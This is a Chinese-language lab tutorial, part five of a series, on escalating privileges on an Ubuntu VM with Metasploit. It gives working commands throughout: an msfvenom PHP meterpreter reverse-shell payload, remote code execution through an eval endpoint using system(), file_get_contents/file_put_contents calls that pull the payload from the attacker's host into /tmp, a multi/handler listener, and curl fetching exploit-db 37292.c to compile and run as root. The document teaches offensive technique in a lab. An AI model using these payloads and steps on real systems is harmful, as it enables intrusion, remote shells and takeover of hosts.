Linux提权之metasploit 提权(五)
首先metasploit是什么呢,该怎末使用呢
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
下边这篇文章告诉哦你
【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客
然后我们呢开始实验
首先准备环境
我们的kail机 ip 192.168.25.138 (这个相信你们都有)
还有上一篇文章的 Ubuntu 主机 ip 192.168.25.135 (这个就是上一篇下载的那个 没有的 我再次放在下边)
通过网盘分享的文件:Ubuntu.zip
链接: 百度网盘 请输入提取码 提取码: 33g3
--来自百度网盘超级会员v3的分享
我们首先打开我们的kail机
输入 ifconfig
我们的ip是192.68.25.138
首先我们先要生成攻击载荷
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.25.138 LPORT=12345 -f raw >shell.php
不知道msfvenom 是啥的
msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名
参考这一篇文章
msfvenom的使用&免杀&外网渗透_msfvalenem-CSDN博客
我就可以看到桌面上有了shell.php
我们来查看一下源代码
我们的目的 就是要把这个攻击载荷 下载到目标主机上
还是一样的
我们首先要开启80端口服务
python3 -m http.server 80
还是老样子
在我们的本机上windows上输入 192.168.25.135
然后打开eval函数 超链接
输入 system 函数
data=system('ls -al');
然后我们查看上一级目录
data=system('ls -al ../');
我们看到了tmp目录 那个临时目录 是谁都可以访问修改的
那我们就进入tmp目录 等下下载到这个目录里
data=system('ls -al ../tmp');
然后我们还是可以用一个反弹shell 然后输入指令 使用wegt或者curl进行下载
这里我们是php代码 咋们可以用php的一个函数来解决
file_get_contents 它可以本地请求 也可以远程http请求
想了解更多的 我们可以看下一篇文章
file_get_contents() 函数详解与使用_php file get contents-CSDN博客
file_get_contents('http://192.168.25.138/shell.php');
看不到内容 我们可以打印出来
echo file_get_contents('http://192.168.25.138/shell.php');
内容跟我们生成的攻击载荷一摸一样
下载我们就要开始写入文件了
file_put_contents函数
不懂得 可以看这一篇文章
php 读写文件 file_put_contents() 与 file_get_contents() 函数用法-CSDN博客
file_put_contents('../tmp/shell.php',file_get_contents('http://192.168.25.138/shell.php'));
现在让我们来查看Ubuntu主机上 有没有下载好没有这个shell.php文件
data=system('ls -al ../tmp');
然后接下来我们启动kail的msf(这里我就不在过多讲解 msf 相信你们都是业内人士)
msfconsole
然后使用监听模块
use exploit/multi/handler
然后设置payload
set payloadphp/meterpreter_reverse_tcp
输入
show options
查看要添加的参数名称
设置参数
set lhost 192.168.25.138 (kail的ip)
set lport 12345 (设置成为与攻击载荷相同的端口)
然后哦我们输入
run
开始监听
然后我们在我们的本机上输入 来访问shell.php
http://192.168.25.135/tmp/shell.php
然后返回kail 已经有了 meterpreter
大家这里不要管我这里的ip怎末变成了192.168.25.136 而不是192.168.25.135(我这里的ip变换了 大家不用管 就按照原来的走)
输入
getuid 查询当前用户
然后查看主机版本
sysinfo
然后我们进入shell
输入id
查询Ubuntu版本
cat /etc/issue
然后我们退出shell 到 meterpreter
exit
我们也可以使用 msf自带的后渗透模块来查询
run post/multi/recon/local_exploit_suggester
然后等待查询结束
这里没有查询到
然后还是一样的
在这个漏洞库查找
https://www.exploit-db.com/exploits/37292
还是上篇找到的 37292.c
虽然上次没有提权成功 因为这个漏洞不稳定
我们这次再试试
首先进入shell
python3 -c 'import pty;pty.spawn("/bin/bash")';
然后下载
curl http://192.168.25.138/37292.c -o /tmp/37292.c
然后进行编译
gcc 37292.c -o exp
输入
./exp
进行运行
这里还是没有成功 哎 太可惜了 很想给你们运行一遍
反正思路就是这个思路
大家可以找别的版本来运行一遍